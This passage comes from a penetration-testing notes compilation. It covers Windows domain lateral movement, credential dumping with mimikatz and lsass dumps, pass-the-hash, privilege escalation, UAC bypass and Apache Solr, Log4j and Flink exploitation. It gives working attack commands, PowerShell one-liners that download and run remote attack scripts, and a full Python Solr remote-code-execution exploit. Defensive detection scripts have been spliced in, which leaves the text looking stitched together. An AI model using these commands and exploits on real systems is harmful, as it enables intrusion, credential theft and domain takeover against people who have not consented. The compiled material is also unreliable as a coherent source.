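            break
        if code == ATTR_REQ_ATTRIBUTE:
            name, pos = unpack_string(pkt, pos)
            value, pos = unpack_string(pkt, pos)
            attrs.append((name, value))
        elif code == ATTR_SSL_KEY_SIZE:
            pos += 2                                              # the only integer-valued attribute
        else:                                                     # every other attribute carries one string
            _v, pos = unpack_string(pkt, pos)
    return req_uri, attrs


def ghostcat_target(pkt):
    """Detection: the path a Forward Request tries to include, or None when it carries no
    javax.servlet.include.* attributes (ordinary reverse-proxy traffic never does)."""
    _uri, attrs = parse_forward_request(pkt)
    included = {n: v for n, v in attrs if n.startswith(INCLUDE_PREFIX)}
    if not included:
        return None
    return included.get(INCLUDE_PREFIX + "path_info", "")
```

Tomcat 9.0.31 and later reject these attributes unless allowedRequestAttributesPattern permits them; on older versions the same check, applied to captured AJP traffic, is a usable detection rule.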
15. Lateral movement inside the domain

Common Windows remote connection commands

IPC$

net use \\IP\ipc$ "password" /user:Administrator

Conditions for using IPC$: port 445 (or 139) is reachable, and the administrative default shares (C$, ADMIN$, IPC$) are enabled.

Gathering remote host information with built-in Windows tools

dir

dir \\IP\c$

tasklist

tasklist /S IP /U administrator /P password

Scheduled tasks

at (Windows Server 2008 and earlier)

Check the target's clock:

net time \\IP

Copy the payload to the target:

copy payload.bat \\IP\C$

Create the scheduled task (a task ID is returned):

at \\IP 8:00AM C:\payload.bat

Remove the at record:

at \\IP taskID /delete

Save a command's output on the remote host with at, then read it over the share:

at \\IP 8:00AM cmd.exe /c "ipconfig > C:\1.txt"
type \\IP\C$\1.txt

schtasks

Establish the IPC$ connection first, then create a task named test:

schtasks /create /s IP /tn test /sc onstart /tr c:\payload.bat /ru system /f

Run it:

schtasks /run /s IP /i /tn "test"

Delete it:

schtasks /delete /s IP /tn "test" /f

Obtaining Windows password hashes

Grabbing passwords on a single machine

GetPass: GetPassword_x64.exe
PwDump7: PwDump7.exe

From the SAM and SYSTEM hives

Export the hives:

reg save hklm\sam sam.hive
reg save hklm\system system.hive

Read the NTLM hashes from the exported hives with mimikatz (Cain can do the same):

lsadump::sam /sam:sam.hive /system:system.hive

Read the local SAM directly on the target with mimikatz:

privilege::debug
lsadump::sam

Read logon passwords from memory with mimikatz:

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"

Reading an lsass.dmp offline with mimikatz

Export lsass.dmp with Task Manager: find lsass.exe in the process list, right-click it and choose "Create dump file".

Export lsass.dmp with Procdump (an official Microsoft tool, so it is usually not flagged by AV):

procdump.exe -accepteula -ma lsass.exe lsass.dmp

Extract the credentials from lsass.dmp with mimikatz:

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

Dump hashes with PowerShell:

Import-Module .\Get-PassHashes.ps1

Load mimikatz remotely with PowerShell to dump hashes and plaintext passwords:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

Pass-the-hash

With an NTLM hash:

mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.hacker /ntlm:[NTLM]"

With an AES-256 key. First grab the key with mimikatz:

mimikatz "privilege::debug" "sekurlsa::ekeys"

Then pass the key (the target must have KB2871997 installed):

mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain:pentest.hacker /aes256:[aes256]"

Pass-the-ticket

With mimikatz. Export tickets:

mimikatz "privilege::debug" "sekurlsa::tickets /export"

Inject a ticket:

mimikatz "kerberos::ptt" "C:\xxx.kirbi"

With kekeo. Generate a ticket file:

kekeo "tgt::ask /user:administrator /domain:pentest.hack /ntlm:[NTLM]"

Import it into memory:

kekeo "kerberos::ptt xxx.kirbi"

PsExec

PsExec from the PsTools suite. Establish the IPC$ connection:

net use \\IP\ipc$ "password" /u:administrator

Get an interactive shell as SYSTEM:

PsExec.exe -accepteula \\IP -s cmd.exe
or
PsExec.exe -accepteula \\IP -s cmd.exe /c ipconfig

Without -s the shell runs as Administrator. Without a prior IPC$ connection:

PsExec.exe -accepteula \\IP -u administrator -p password -s cmd.exe

Metasploit psexec modules: exploit/windows/smb/psexec and exploit/windows/smb/psexec_psh (PowerShell version)

WMI

Basic command:

wmic /node:IP /user:administrator /password:password process call create "cmd.exe /c ipconfig > C:\ip.txt"

After establishing an IPC$ connection, read the result with type:

type \\IP\C$\ip.txt

wmiexec from impacket:

wmiexec.py administrator:password@IP

wmiexec.vbs

Semi-interactive shell:

cscript.exe //nologo wmiexec.vbs /shell IP administrator password

Run a single command:

cscript.exe wmiexec.vbs /cmd IP administrator password "ipconfig"

Commands that run for a while, such as ping and systeminfo, need -wait 5000 or a longer wait. Commands that produce no output and keep running, such as nc, need -persist.

Invoke-WmiCommand from PowerSploit

Import Invoke-WmiCommand.ps1, then:

$User = "pentest.hacker\administrator"
$Password = ConvertTo-SecureString -String "password" -AsPlainText -Force
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User, $Password
$Remote = Invoke-WmiCommand -Payload {ipconfig} -Credential $Cred -ComputerName IP
$Remote.PayloadOutput

Invoke-WMIMethod

Invoke-WMIMethod ships with PowerShell; it is non-interactive and returns no output.

$User = "pentest.hacker\administrator"
$Password = ConvertTo-SecureString -String "password" -AsPlainText -Force
$Cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $User, $Password
Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "calc.exe" -Credential $Cred -ComputerName IP

EternalBlue (MS17-010)

auxiliary/scanner/smb/smb_ms17_010
exploit/windows/smb/ms17_010_eternalblue

smbexec

C++ smbexec: upload execserver.exe to C:\Windows\ on the target (the tool lifts UAC restrictions on the commands it runs).
net use \\IP "password" /user:pentest\administrator
test.exe IP administrator password whoami c$

smbexec.py from impacket:

smbexec.py pentest/administrator:password@IP

DCOM on remote systems

Running commands through DCOM locally

List the DCOM applications. Windows Server 2012 and later:

Get-CimInstance Win32_DCOMApplication

Windows 7 and Windows Server 2008:

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication

Run an arbitrary command via DCOM. Start an elevated PowerShell locally:

[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1")).Document.ActiveView.ExecuteShellCommand("cmd.exe","0","/c calc.exe","Minimized")

Running commands on a remote machine through DCOM

The account used for the remote connection must have local administrator rights on the target. Connect with IPC$:

net use \\IP "password" /user:pentest.hacker\win7user

Execute through MMC20.Application:

$com = [Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","IP"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe","0","/c calc.exe","Minimized")

Execute through CLSID 9BA05972-F6A8-11CF-A442-00A0C90A8F39 (ShellWindows):

$com = [Type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","IP")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.Item()
$item.Document.Application.ShellExecute("cmd.exe","/c calc.exe","c:\windows\system32",$null,0)

SPNs in the domain

SPN scanning with PowerShell-AD-Recon

Discover every MSSQL service in the domain through SPNs:

Import-Module .\Discover-PSMSSQLServers.ps1
Discover-PSMSSQLServers

Scan all interesting SPNs:

Import-Module .\Discover-PSInterestingServices.ps1
Discover-PSInterestingServices

Without third-party scripts, query every SPN with:

setspn -T domain -q */*

Attacking Exchange mail servers

Discovering Exchange

Port scan:

nmap -A -O -sV IP

SPN query:

setspn -T pentest.hacker -F -Q */*

Basic Exchange operations

List the mailbox databases:

Add-PSSnapin microsoft.exchange*
Get-MailboxDatabase -Server "Exchange1"

Query one database in detail:

Get-MailboxDatabase -Identity "Mailbox Database 1894576043" | Format-List Name,EdbFilePath,LogFolderPath

Mail addresses of existing users:

Get-Mailbox | Format-Table Name,WindowsEmailAddress

Mailbox usage of a given user:

Get-MailboxStatistics -Identity administrator | Select DisplayName,ItemCount,TotalItemSize,LastLogonTime

Item counts of all mailboxes:

Get-Mailbox -ResultSize Unlimited | Get-MailboxStatistics | Sort-Object TotalItemSize -Descending

Exporting specific mailboxes

Configure import/export permission. Check who holds it:

Get-ManagementRoleAssignment -Role "Mailbox Import Export" | Format-List RoleAssigneeName

Grant it:

New-ManagementRoleAssignment -Name "Import Export_Domain Admins" -User "Administrator" -Role "Mailbox Import Export"

Revoke it:

Remove-ManagementRoleAssignment "Import Export_Domain Admins" -Confirm:$false

Create a network share for the export:

net share inetpub=c:\inetpub /grant:everyone,full

Export the user's mailbox:

New-MailboxExportRequest -Mailbox administrator -FilePath \\IP\inetpub\administrator.pst

Managing export requests. View previous exports:

Get-MailboxExportRequest

Remove a given user's completed export request:

Remove-MailboxExportRequest -Identity Administrator\mailboxexport

Remove all completed requests:

Get-MailboxExportRequest -Status Completed | Remove-MailboxExportRequest
16. Privilege escalation and its defence

Kernel exploits

Find missing patches by hand:

systeminfo
wmic qfe get Caption,Description,HotfixID,InstalledOn

Look for specific patch numbers:

wmic qfe get Caption,Description,HotfixID,InstalledOn | findstr /C:"KB3143141" /C:"KB976902"

Windows Exploit Suggester

Save the output of systeminfo (which includes the installed hotfixes) to patches.txt. Update the bulletin database:

python windows-exploit-suggester.py --update

Check for vulnerabilities:

python windows-exploit-suggester.py -d 2019-02-02-mssb.xls -i patches.txt

Metasploit's built-in post/multi/recon/local_exploit_suggester module does the same from a session.

Sherlock (PowerShell): https://github.com/rasta-mouse/Sherlock

Import-Module .\Sherlock.ps1
Find-AllVulns

Its successor: https://github.com/rasta-mouse/Watson

Exploiting Windows misconfigurations

Service permission misconfigurations

PowerUp: https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowershellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks"

In Metasploit the corresponding module is exploit/windows/local/service_permissions.

The AlwaysInstallElevated registry key

AlwaysInstallElevated is a Group Policy setting that lets standard users run Windows Installer packages (MSI) with SYSTEM privileges. If it is enabled, an attacker can escalate with a malicious MSI. When a Meterpreter session cannot be elevated to SYSTEM by the usual means, this setting is another avenue.

Check the registry manually:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both values are 1, the system is exploitable.

With PowerUp:

powershell.exe -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowershellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Get-RegistryAlwaysInstallElevated"

Build an MSI that adds an account:

Write-UserAddMSI

Run it as a normal user:

msiexec /q /i UserAdd.msi

Metasploit has the matching module exploit/windows/local/always_install_elevated.

Unquoted service paths

Find candidate services (auto-start, outside C:\Windows, path not quoted):

wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Rename the program to upload so that it matches the unquoted path, place it in the writable directory, and restart the service:

sc stop service_name
sc start service_name

Metasploit's "Windows Service Trusted Path Privilege Escalation" module (exploit/windows/local/trusted_service_path) tests the same thing. Note: set AutoRunScript migrate -f in msf so the session survives if the service process is killed.

Unattended installation files

dir /b /s c:\Unattend.xml
dir /b /s c:\sysprep.xml

Check whether these files contain base64-encoded passwords. Metasploit's post/windows/gather/enum_unattend module automates this.

Scheduled tasks

List scheduled tasks:

schtasks /query /fo LIST /v

Check whether a task's directory is writable:

accesschk.exe -dqv "C:\Microsoft" -accepteula

List every directory on a drive with weak permissions:

accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

List every file on a drive with weak permissions:

accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

Empire built-in modules:

usemodule privesc/powerup/xxxx

Bypassing UAC

bypassuac modules. The current user must be a member of the Administrators group.

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_inject
getsystem

RunAs module:

exploit/windows/local/ask

A UAC prompt appears on the target and a high-integrity shell comes back once the user clicks it. Check with getuid; if the shell is still a normal user, run getsystem.

Nishang's Invoke-PsUACme module:

Invoke-PsUACme -Verbose                       # sysprep method with the default payload
Invoke-PsUACme -method oobe -Verbose          # oobe method with the default payload
Invoke-PsUACme -Payload "powershell -windowstyle hidden -e YourEncodedPayload"   # custom payload

Empire's bypassuac modules:

usemodule privesc/bypassuac
execute

usemodule privesc/bypassuac_wscript
execute

Token stealing

Token stealing in msf, assuming a Meterpreter shell:

use incognito
list_tokens -u

Impersonate a token with incognito (hostname\username is written with two backslashes):

impersonate_token DESKTOP-DUNPKQ9\\Administrator

Rotten Potato local privilege escalation:

use incognito
list_tokens -u
execute -HC -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"

Adding a domain administrator

If a process running as a domain administrator exists on the host, migrate the Meterpreter session into it and run:

net user test test123!@# /add /domain
net group "domain admins" test /add /domain

Alternatively, incognito in the Meterpreter shell can impersonate a domain administrator (iterating over all delegation tokens available on the system) and add the account on the domain controller:

add_user test test!@#123 -h 1.1.1.2

Then add it to the Domain Admins group:

add_group_user "Domain Admins" test -h 1.1.1.2

Token stealing in Empire

Run mimikatz, list the captured credentials with creds, then pass the hash by credential ID:

pth CredID

Getting access without credentials

LLMNR and NetBIOS spoofing with Responder

Turn on the monitoring mode
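The manual patch check and the AlwaysInstallElevated registry check above both come down to parsing command output and comparing it with a list. The following Python is an added example, not code from the original post or from Windows Exploit Suggester/Sherlock. The wmic, systeminfo and reg query outputs it parses are constructed samples, and the list of required KBs passed to missing_hotfixes is a placeholder to be filled from the MSSB spreadsheet the suggester downloads; the script asserts nothing about what any particular KB fixes.

```python
import re

# Constructed sample output of `wmic qfe get Caption,Description,HotfixID,InstalledOn`.
WMIC_QFE_SAMPLE = """\
Caption                                     Description      HotFixID   InstalledOn
http://support.microsoft.com/?kbid=2871997  Security Update  KB2871997  6/10/2014
http://support.microsoft.com/?kbid=976902   Update           KB976902   11/21/2010
"""

# Constructed sample of the hotfix block in `systeminfo` output.
SYSTEMINFO_SAMPLE = """\
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2871997
                           [02]: KB976902
"""

# Constructed sample output of the two `reg query ... /v AlwaysInstallElevated` commands.
REG_QUERY_SAMPLE = """\
HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""

KB_RE = re.compile(r"\bKB\d{6,7}\b")


def installed_hotfixes(text):
    """KB numbers found in either wmic qfe or systeminfo output (same regex serves both)."""
    return set(KB_RE.findall(text))


def missing_hotfixes(installed, required):
    """Sorted KBs from `required` that are not installed. `required` is the list to
    populate from the bulletin spreadsheet or Sherlock's checks; it is not built in."""
    return sorted(set(required) - set(installed))


def always_install_elevated(reg_output):
    """True only when AlwaysInstallElevated is 0x1 under both HKCU and HKLM,
    the condition the post gives for the msiexec escalation to work."""
    values = re.findall(r"AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)", reg_output)
    return len(values) == 2 and all(int(v, 16) == 1 for v in values)


if __name__ == "__main__":
    have = installed_hotfixes(WMIC_QFE_SAMPLE)
    print("installed:", sorted(have))
    print("missing:  ", missing_hotfixes(have, ["KB3143141", "KB2871997"]))   # placeholder list
    print("AlwaysInstallElevated exploitable:", always_install_elevated(REG_QUERY_SAMPLE))
```

Redirect the real command output to files on the target and feed those files to the two parsers; the only part that needs curation is the required-KB list.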
17. Apache Solr template injection remote code execution

Apache Solr is an open-source search server built on Lucene. Apache Velocity is a template engine used for HTML pages, e-mail templates and general-purpose code generation. In several Solr versions the configuration of the VelocityResponseWriter can be changed over HTTP; once params.resource.loader.enabled is switched on, a Velocity template supplied in the request is rendered, so any command can be executed. Solr has no authentication enabled by default, so no credentials are needed.

Affected versions

5.0.0 <= Apache Solr <= 8.3.1

Environment setup

The vulhub solr environment can be used:

    docker-compose up -d
    docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

Copy the jar files whose names start with velocity from contrib/velocity/lib to server/solr-webapp/webapp/WEB-INF/lib/ and restart the Solr service.

Reproduction

With the environment above, exploitation takes two steps. First, set the key parameter params.resource.loader.enabled to true through an HTTP request, which allows the template to be taken from request parameters. Then supply a Velocity template that executes a command.
Step one: POST the following JSON to the core's config API, http://IP:8983/solr/test/config:

    {
      "update-queryresponsewriter": {
        "startup": "lazy",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"
      }
    }

Step two: request

    http://IP:8983/solr/test/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

The response body contains the output of the id command.

Remediation

Upgrade to Apache Solr 8.4 or later.
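The two requests above can be generated rather than hand-edited, and the same structure can be used to audit a core. The Python below is an added example (not vulhub's or the Solr project's code): it builds the config-API body, builds the select URL carrying the Velocity template for an arbitrary command, and checks a core's config JSON for a Velocity writer with params.resource.loader.enabled. The config-response shape is assumed to mirror the update body, and both sample configs are constructed.

```python
"""Request builders and a config check for the Solr VelocityResponseWriter template injection."""
import json
import sys
import urllib.request
from urllib.parse import urlencode


def velocity_config() -> dict:
    """Body for POST /solr/<core>/config. params.resource.loader.enabled=true is the
    dangerous switch: it lets a request parameter supply the template itself."""
    return {"update-queryresponsewriter": {
        "startup": "lazy",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true",
    }}


def velocity_rce_template(command: str) -> str:
    """Velocity template that runs `command` through java.lang.Runtime and echoes stdout.
    Velocity exposes no classes directly, so it pivots through the .class of an empty String."""
    if "'" in command:
        raise ValueError("single quotes would terminate the Velocity string literal")
    return (
        "#set($x='')"
        "#set($rt=$x.class.forName('java.lang.Runtime'))"
        "#set($chr=$x.class.forName('java.lang.Character'))"
        "#set($str=$x.class.forName('java.lang.String'))"
        f"#set($ex=$rt.getRuntime().exec('{command}'))"
        "$ex.waitFor()"
        "#set($out=$ex.getInputStream())"
        "#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end"
    )


def select_url(base: str, core: str, command: str) -> str:
    """GET URL for step two; urlencode percent-encodes # $ ( ) ' which Solr accepts."""
    params = {"q": "1", "wt": "velocity", "v.template": "custom",
              "v.template.custom": velocity_rce_template(command)}
    return f"{base}/solr/{core}/select?{urlencode(params)}"


def velocity_exposed(config: dict) -> bool:
    """True if the core registers a Velocity writer that accepts templates from parameters.
    Assumes GET /solr/<core>/config returns {"config": {"queryResponseWriter": {name: {...}}}}."""
    writers = config.get("config", {}).get("queryResponseWriter", {})
    for writer in writers.values():
        is_velocity = "VelocityResponseWriter" in str(writer.get("class", ""))
        loader_on = str(writer.get("params.resource.loader.enabled", "false")).lower() == "true"
        if is_velocity and loader_on:
            return True
    return False


# Constructed config responses for the check; not captured from a real server.
EXPOSED_CONFIG = {"config": {"queryResponseWriter": {"velocity": {
    "class": "solr.VelocityResponseWriter", "params.resource.loader.enabled": "true"}}}}
SAFE_CONFIG = {"config": {"queryResponseWriter": {
    "json": {"class": "solr.JSONResponseWriter"},
    "velocity": {"class": "solr.VelocityResponseWriter", "params.resource.loader.enabled": "false"}}}}


def exploit(base: str, core: str, command: str) -> str:
    """Run both steps against a live core (authorized testing only)."""
    req = urllib.request.Request(
        f"{base}/solr/{core}/config",
        data=json.dumps(velocity_config()).encode(),
        headers={"Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req) as resp:
        resp.read()
    with urllib.request.urlopen(select_url(base, core, command)) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    if len(sys.argv) == 4:
        print(exploit(sys.argv[1], sys.argv[2], sys.argv[3]))  # e.g. http://IP:8983 test id
    else:
        print(select_url("http://IP:8983", "test", "id"))
```

Run it as `python3 solr_velocity.py http://IP:8983 test id` against the vulhub core; without arguments it only prints the step-two URL for inspection. Operators auditing their own cores should fetch /solr/<core>/config and pass it to velocity_exposed.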
18. Intranet penetration workflow

1 Initial access
  - Basic web vulnerabilities (weak passwords, file upload, file inclusion, RCE, deserialization)
  - 0/1/N-day RCE in common services (vsftpd, Samba, fastcgi)
  - Personal workstations (phishing, watering hole)
  - Supply chain attacks
  - VPN, VNC, TV, etc. 0/1-day

1.1 Determine the network position
  - Network area: DMZ, production network, office network
  - Host role: operations, administrative, ...
  - Connectivity: icmp

1.2 Proxy
  - Online test: exe or ps1
  - TCP/UDP/HTTP/HTTPS/DNS/ICMP
  - Port or socket

1.3 Recon
  - Workgroup or domain
  - Domain admin or not
  - Commands or secret files
  - Host discovery
  1.3.1 Browser history and passwords: Firefox, Chrome, ...
  1.3.2 RDP: logon events, MSTSC history
  1.3.3 Credential manager: web credentials
  1.3.4 Information gathering: agent, network discovery
  1.3.5 User monitoring: login monitoring, drag monitoring
19. Apache Solr CVE-2019-12409 RCE reproduction

The vulnerability stems from the ENABLE_REMOTE_JMX_OPTS option in the default solr.in.sh. With the default solr.in.sh of an affected version, JMX monitoring is enabled and exposed on RMI_PORT (default 18983) without authentication. If the firewall allows inbound traffic to that port, anyone with network access to the Solr node can reach JMX and upload and execute code on the Solr server. Windows installations are not affected; only some Linux versions are, because solr.in.sh is the Linux start-up script.

Environment setup

docker-compose.yml:

    version: '2'
    services:
      solr:
        image: vulhub/solr:8.1.1
        ports:
          - "8983:8983"
          - "18983:18983"

Start the environment:

    docker-compose up -d
    docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

Check whether the vulnerable configuration is active inside the container:

    docker ps -a                              # find the CONTAINER ID of the running container
    docker exec -it CONTAINER_ID /bin/bash    # the Solr config lives in /etc/default by default
    cat /etc/default/solr.in.sh | grep true   # ENABLE_REMOTE_JMX_OPTS="true" means JMX is exposed

Browse to http://IP:8983: the Solr admin page is reachable without logging in.

Reproduction

Open msf, configure the payload, set the attacker and victim IPs, and run the exploit.
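The `grep true` check above also matches a commented-out line, so a hardened solr.in.sh can look vulnerable (or a real setting can be missed if it is spelled with different quoting). The Python below is an added example, not Solr's code: it parses the file the way the shell does when it sources it, skipping comments and honouring quotes, and reports the effective JMX exposure. The two file excerpts are constructed for the example, not copied from a Solr release.

```python
"""Determine whether a solr.in.sh really enables remote JMX (CVE-2019-12409 exposure)."""
import re
import shlex

# Constructed excerpts in the style of solr.in.sh; not copied from any Solr release.
VULNERABLE_SOLR_IN_SH = """
# Enable remote JMX access? Exposes an unauthenticated RMI listener on RMI_PORT.
ENABLE_REMOTE_JMX_OPTS="true"
RMI_PORT=18983
SOLR_OPTS="$SOLR_OPTS -Dsolr.autoSoftCommit.maxTime=3000"
"""

HARDENED_SOLR_IN_SH = """
# ENABLE_REMOTE_JMX_OPTS="true"   <- left in as a comment; `grep true` still matches it
ENABLE_REMOTE_JMX_OPTS="false"
RMI_PORT=18983
"""

_ASSIGN = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)=(.*)$")


def parse_sh_assignments(text: str) -> dict:
    """Effective NAME=value pairs: comment lines skipped, quotes removed, trailing comments
    dropped, and the last assignment wins, as when the shell sources the file."""
    env = {}
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        match = _ASSIGN.match(line)
        if not match:
            continue
        name, raw = match.groups()
        parts = shlex.split(raw, comments=True)
        env[name] = parts[0] if parts else ""
    return env


def naive_grep_true(text: str) -> bool:
    """What `cat solr.in.sh | grep true` reports: any line containing the word true."""
    return any("true" in line for line in text.splitlines())


def jmx_exposure(text: str) -> dict:
    """Effective JMX state: enabled flag and the RMI port the agent would bind (default 18983)."""
    env = parse_sh_assignments(text)
    return {
        "enabled": env.get("ENABLE_REMOTE_JMX_OPTS", "false").lower() == "true",
        "rmi_port": int(env.get("RMI_PORT", "18983")),
    }


if __name__ == "__main__":
    for label, text in (("vulnerable", VULNERABLE_SOLR_IN_SH), ("hardened", HARDENED_SOLR_IN_SH)):
        print(label, jmx_exposure(text), "grep true says:", naive_grep_true(text))
```

On the hardened excerpt the grep heuristic still reports a match while the parser reports enabled=False; on a real host, run the parser over /etc/default/solr.in.sh and confirm with `ss -lntp` that nothing listens on the reported RMI port.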
20. Apache Log4j SocketServer deserialization vulnerability reproduction

Apache Log4j is a Java logging library from the Apache Software Foundation and one of several Java logging frameworks. Apache disclosed a deserialization vulnerability (CVE-2019-17571) in the SocketServer class of the 1.2.x branch that allows remote code execution. When a socket listener created with org.apache.log4j.net.SocketServer processes incoming data, it deserializes untrusted input; combined with a gadget chain on the classpath (commons-collections here), an attacker achieves remote code execution.

Environment setup

Start the listener with log4j 1.2.17 and commons-collections 3.1 on the classpath:

    java -cp log4j-1.2.17.jar:commons-collections-3.1.jar org.apache.log4j.net.SocketServer 8888 ./log4jserver.properties ./

Reproduction

    java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 'open -a Calculator' | nc 127.0.0.1 8888

After the payload is sent, the calculator pops up.

Remediation

The Log4j 1.2 branch reached end of life in August 2015. The issue is fixed in Log4j 2.8.2; upgrade to 2.8.2 or later as soon as possible (download: https://logging.apache.org/log4j/2.x/download.html). Stop creating socket listeners with the Log4j SocketServer class; deployments that do not use SocketServer are not affected.
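A SocketServer hands every incoming stream straight to ObjectInputStream, but the class descriptors in a Java serialization stream can be read cheaply before that happens. The Python below is an added example, not Log4j code: a heuristic scanner that extracts the class names announced in a stream and flags the CommonsCollections gadget classes the ysoserial payload above is built from. The two streams are constructed, abridged descriptors rather than real captures, and the denylist was assembled for this example.

```python
"""Heuristic gadget-class scan of a Java serialization stream (what a SocketServer deserializes)."""
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"  # STREAM_MAGIC followed by STREAM_VERSION 5
TC_OBJECT, TC_CLASSDESC = 0x73, 0x72
_CLASS_NAME = re.compile(rb"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)+$")

# Classes the CommonsCollections5 chain is built from (denylist assembled for this example).
DENYLIST = (
    b"javax.management.BadAttributeValueExpException",
    b"org.apache.commons.collections.keyvalue.TiedMapEntry",
    b"org.apache.commons.collections.map.LazyMap",
    b"org.apache.commons.collections.functors.",
)


def class_names(stream: bytes) -> list:
    """Class names announced by TC_CLASSDESC records. Heuristic: a 0x72 byte followed by a
    2-byte length and a well-formed dotted Java name. Data bytes that happen to be 0x72
    fail the name check and are skipped, which keeps false positives low."""
    if not stream.startswith(STREAM_MAGIC):
        raise ValueError("not a Java serialization stream")
    names, i = [], len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (length,) = struct.unpack(">H", stream[i + 1:i + 3])
            name = stream[i + 3:i + 3 + length]
            if length and len(name) == length and _CLASS_NAME.match(name):
                names.append(name.decode())
                i += 3 + length
                continue
        i += 1
    return names


def flagged_classes(stream: bytes) -> list:
    """Announced classes that match the denylist; non-empty means drop the message."""
    return [n for n in class_names(stream) if n.encode().startswith(DENYLIST)]


def class_desc(name: bytes, suid: int = 0) -> bytes:
    """Abridged TC_CLASSDESC for building samples: name, serialVersionUID,
    SC_SERIALIZABLE flag, zero fields (annotations and superclass omitted)."""
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name
            + struct.pack(">q", suid) + b"\x02\x00\x00")


# Constructed streams: a plain LoggingEvent vs. the head of a CommonsCollections5-style payload.
BENIGN_STREAM = STREAM_MAGIC + bytes([TC_OBJECT]) + class_desc(b"org.apache.log4j.spi.LoggingEvent")
GADGET_STREAM = (STREAM_MAGIC + bytes([TC_OBJECT]) + class_desc(b"javax.management.BadAttributeValueExpException")
                 + bytes([TC_OBJECT]) + class_desc(b"org.apache.commons.collections.keyvalue.TiedMapEntry"))


if __name__ == "__main__":
    for label, stream in (("benign", BENIGN_STREAM), ("gadget", GADGET_STREAM)):
        print(label, class_names(stream), "flagged:", flagged_classes(stream))
```

A scanner like this is a tripwire, not a fix: TC_REFERENCE back-pointers and nested class descriptors mean a determined payload can still hide names from a byte-level pass, so the real mitigations remain the ones in the remediation section, retiring SocketServer and moving off the 1.2 branch.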
21. Apache Flink arbitrary jar upload RCE

Apache Flink is a distributed big-data processing engine that performs stateful computation over bounded and unbounded data streams and can be deployed in a variety of cluster environments. It is an open-source stream-processing framework from the Apache Software Foundation whose core is a distributed streaming dataflow engine written in Java and Scala. Flink executes arbitrary dataflow programs in a data-parallel and pipelined manner; its runtime supports both batch and streaming programs as well as iterative algorithms.

The Flink dashboard lets anyone who can reach it upload and run a jar. An attacker can upload a jar containing a Metasploit payload and execute arbitrary code on the Flink server with the privileges of the Flink process, which makes the issue severe.

Affected versions

Apache Flink <= 1.9.1

Environment setup

Download Apache Flink 1.9.1:

    wget http://mirrors.tuna.tsinghua.edu.cn/apache/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

Unpack it:

    tar -zxvf flink-1.9.1-bin-scala_2.11.tgz

Enter the bin directory and start Flink:

    ./start-cluster.sh

Browse to http://IP:8081.

Reproduction

Generate a reverse-shell jar with msfvenom:

